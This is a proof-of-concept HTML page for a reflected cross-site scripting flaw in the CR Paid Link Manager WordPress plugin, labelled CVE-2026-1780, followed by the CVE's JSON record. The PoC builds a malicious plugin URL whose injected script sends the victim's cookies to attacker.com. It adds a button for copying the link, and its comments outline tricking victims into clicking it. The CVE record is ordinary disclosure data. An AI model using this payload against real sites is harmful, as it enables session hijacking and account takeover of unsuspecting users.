CVE-2026-1780

<!-- CVE-2026-1780 PoC: Reflected XSS in CR Paid Link Manager --> <!-- Target: WordPress site with CR Paid Link Manager plugin <= 0.5 --> <!-- This PoC demonstrates how an attacker can inject JavaScript via URL path --> <!DOCTYPE html> <html> <head> <title>CVE-2026-1780 PoC</title> </head> <body> <h2>CVE-2026-1780 Reflected XSS PoC</h2> <p>Target: CR Paid Link Manager WordPress Plugin <= 0.5</p> <!-- Malicious URL that exploits the reflected XSS --> <p>Malicious URL:</p> <code id="malicious-url"></code> <script> // Generate the malicious URL var targetBase = window.location.origin + '/wp-content/plugins/crpaid-link-manager/'; var xssPayload = '<script>alert("XSS - CVE-2026-1780");document.location="https://attacker.com/steal?cookie="+document.cookie</' + 'script>'; var maliciousUrl = targetBase + xssPayload; document.getElementById('malicious-url').textContent = maliciousUrl; // Display the URL for testing console.log('Malicious URL:', maliciousUrl); /* * Attack Scenario: * 1. Attacker crafts a URL with XSS payload in the path * 2. Attacker tricks victim into clicking the link (social engineering) * 3. Victim's browser executes the injected JavaScript * 4. Attacker can steal cookies, session tokens, or perform actions as the victim * * Note: This is for educational and security testing purposes only. */ </script> <!-- Alternative PoC: Direct link generation --> <button onclick="copyUrl()">Copy Malicious URL</button> <script> function copyUrl() { var url = document.getElementById('malicious-url').textContent; navigator.clipboard.writeText(url); alert('URL copied to clipboard'); } </script> </body> </html>

{"cve": {"id": "CVE-2026-1780", "sourceIdentifier": "[email protected]", "published": "2026-03-18T04:17:14.073", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The [CR]Paid Link Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the URL path in all versions up to, and including, 0.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin [CR]Paid Link Manager para WordPress es vulnerable a cross-site scripting reflejado a través de la ruta URL en todas las versiones hasta la 0.5, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes. Esto permite a atacantes no autenticados inyectar scripts web arbitrarios en páginas que se ejecutan si logran engañar a un usuario para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/log/crpaid-link-manager/tags?rev=3479722", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e5b00388-48b8-4e82-ab52-1cd3d02177b7?source=cve", "source": "[email protected]"}]}}